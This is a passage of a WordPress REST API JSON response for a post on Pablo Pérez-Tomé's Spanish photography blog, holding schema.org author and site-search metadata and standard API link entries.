original.","publisher":{"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.perez-tome.net\/pptgrafia\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":["Person","Organization"],"@id":"https:\/\/www.perez-tome.net\/pptgrafia\/#\/schema\/person\/90f20700c171f4d2c0dda5d88f00cf6b","name":"Pablo P\u00e9rez-Tom\u00e9","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","url":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg","caption":"Pablo P\u00e9rez-Tom\u00e9"},"logo":{"@id":"https:\/\/secure.gravatar.com\/avatar\/e5c55b896f84e693c043020e9446fc02709c43b70af9baa420d6430184267f4e?s=96&d=mm&r=pg"},"description":"In fieri et in actu. Bullir continuo sin parar: De la \u00e9tica a la est\u00e9tica por la geofotograf\u00eda, hist\u00f3rico-social-pol\u00edtica. Inconformista. Comunidad de Madrid - Espa\u00f1a","sameAs":["http:\/\/www.perez-tome.net\/pptgrafia"]}]}},"_links":{"self":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/1838","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/comments?post=1838"}],"version-history":[{"count":1,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/1838\/revisions"}],"predecessor-version":[{"id":3582,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/posts\/1838\/revisions\/3582"}],"wp:attachment":[{"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/media?parent=1838"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/categories?post=1838"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.perez-tome.net\/pptgrafia\/wp-json\/wp\/v2\/tags?post=1838"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}